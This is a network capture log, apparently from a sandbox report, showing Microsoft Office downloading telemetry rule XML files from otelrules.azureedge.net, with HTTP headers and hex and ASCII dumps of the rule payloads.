                                                        2024-11-12 15:27:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.64982813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:14 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:14 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:14 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 405
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                        ETag: "0x8DC582B942B6AFF"
                                                        x-ms-request-id: e1e5caf7-d01e-00ad-6fa7-34e942000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152714Z-17df447cdb54qlp6hC1DFW67e800000002000000000021h5
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:14 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.64982913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:14 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:14 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:14 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 468
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                        ETag: "0x8DC582BBA642BF4"
                                                        x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152714Z-16547b76f7fnlcwwhC1DFWz6gw0000000fug00000000pbmr
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:14 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.64983113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:15 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:15 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1952
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                        ETag: "0x8DC582B956B0F3D"
                                                        x-ms-request-id: 31833cf5-a01e-0070-33a3-34573b000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152715Z-17df447cdb542kkvhC1DFW3d4400000000zg000000009vz0
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:15 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.64983013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:15 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:15 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 174
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                        ETag: "0x8DC582B91D80E15"
                                                        x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152715Z-16547b76f7f7rtshhC1DFWrtqn0000000fyg000000001f65
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:15 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.64983313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:15 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:15 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 501
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                        ETag: "0x8DC582BACFDAACD"
                                                        x-ms-request-id: 6028abc9-b01e-0002-6508-2c1b8f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152715Z-16547b76f7fkj7j4hC1DFW0a9g0000000fpg00000000pyzf
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:15 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.64983213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:15 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:15 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 958
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                        ETag: "0x8DC582BA0A31B3B"
                                                        x-ms-request-id: 3b18ef07-001e-0028-3ba8-34c49f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152715Z-17df447cdb5jg4kthC1DFW6vy000000000n00000000074y7
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:15 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.64983413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:15 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:15 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:15 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2592
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                        ETag: "0x8DC582BB5B890DB"
                                                        x-ms-request-id: f6eefceb-a01e-001e-33a0-3449ef000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152715Z-17df447cdb5zfhrmhC1DFWh3300000000c1000000000f0d3
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:15 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.64983513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:16 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:16 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:16 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 3342
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                        ETag: "0x8DC582B927E47E9"
                                                        x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152716Z-16547b76f7fcjqqhhC1DFWrrrc0000000fpg00000000nw9u
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:16 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.64983713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:16 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:16 UTC494INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:16 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1393
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                        ETag: "0x8DC582BE3E55B6E"
                                                        x-ms-request-id: 66308e6b-801e-002a-7da6-3431dc000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152716Z-17df447cdb5fh5hghC1DFWam04000000095000000000d087
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:16 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.64983613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:16 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:16 UTC515INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:16 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2284
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                        ETag: "0x8DC582BCD58BEEE"
                                                        x-ms-request-id: e8ae0579-a01e-00ab-7fa7-349106000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152716Z-15869dbbcc6j87jfhC1DFWr0yc000000083g000000009tef
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:16 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.64983913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:16 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:16 UTC538INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:16 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1393
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                        ETag: "0x8DC582BE39DFC9B"
                                                        x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152716Z-16547b76f7f9bs6dhC1DFWt3rg0000000fu000000000b231
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
